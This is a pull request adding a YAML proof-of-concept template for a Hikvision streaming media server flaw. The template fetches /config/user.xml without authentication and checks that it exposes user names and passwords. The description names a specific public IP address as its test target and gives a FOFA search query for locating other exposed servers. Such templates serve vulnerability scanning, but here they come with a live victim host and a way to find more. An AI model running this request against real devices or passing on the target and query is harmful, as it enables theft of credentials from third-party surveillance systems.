### PR TITLE
Hikvision 流媒体管理服务器未授权敏感信息泄露

### DIFF
--- a/pocs/hikvision-info-leak.yml
+++ b/pocs/hikvision-info-leak.yml
@@ -1,12 +1,12 @@
 name: poc-yaml-hikvision-info-leak
 set:
-    r1: randomLowercase(16)
+  r1: randomLowercase(16)
 rules:
   - method: GET
     path: /xxid/{{r1}}
     follow_redirects: false
     expression: |
-      response.status == 404 && response.body.bcontains(b"File not found") 
+      response.status == 404 && response.body.bcontains(b"File not found")
   - method: GET
     path: /config/user.xml
     follow_redirects: false

--- a/pocs/hikvision-info-leak.yml
+++ b/pocs/hikvision-info-leak.yml
@@ -1,0 +1,19 @@
+name: poc-yaml-hikvision-info-leak
+set:
+    r1: randomLowercase(16)
+rules:
+  - method: GET
+    path: /xxid/{{r1}}
+    follow_redirects: false
+    expression: |
+      response.status == 404 && response.body.bcontains(b"File not found") 
+  - method: GET
+    path: /config/user.xml
+    follow_redirects: false
+    expression: |
+      response.status == 200 && response.body.bcontains(b"<user name=\"") && response.body.bcontains(b" password=\"")
+detail:
+  author: tangshoupu
+  info: Hikvision 流媒体管理服务器未授权敏感信息泄露，可以直接获取用户的用户名和密码
+  links:
+    - https://github.com/test502git/

--- a/pocs/hikvision-info-leak.yml
+++ b/pocs/hikvision-info-leak.yml
@@ -14,6 +14,6 @@ rules:
       response.status == 200 && response.body.bcontains(b"<user name=\"") && response.body.bcontains(b" password=\"")
 detail:
   author: tangshoupu
-  info: Hikvision 流媒体管理服务器未授权敏感信息泄露，可以直接获取用户的用户名和密码
+  info: Hikvision ikvision-info-leak
   links:
-    - https://github.com/test502git/
+    - https://github.com/test502git

--- a/pocs/hikvision-info-leak.yml
+++ b/pocs/hikvision-info-leak.yml
@@ -1,12 +1,10 @@
 name: poc-yaml-hikvision-info-leak
-set:
-  r1: randomLowercase(16)
 rules:
   - method: GET
-    path: /xxid/{{r1}}
+    path: /
     follow_redirects: false
     expression: |
-      response.status == 404 && response.body.bcontains(b"File not found")
+      response.status == 200 && response.body.bcontains(b"<TITLE>流媒体管理服务器</TITLE>") && response.body.bcontains(b"海康威视")
   - method: GET
     path: /config/user.xml
     follow_redirects: false
@@ -16,4 +14,4 @@ detail:
   author: tangshoupu
   info: Hikvision ikvision-info-leak
   links:
-    - https://github.com/test502git
+    - https://www.seebug.org/vuldb/ssvid-91762


### PR DESCRIPTION
## 本 poc 是检测什么漏洞的
Hikvision 流媒体管理服务器未授权敏感信息泄露
## 测试环境
http://222.170.1.62:7788/
## 备注
### fofa语法：title="流媒体管理服务器"
![image](https://user-images.githubusercontent.com/50769953/119930421-edb06400-bf6e-11eb-925e-1e9f5acb39ac.png)
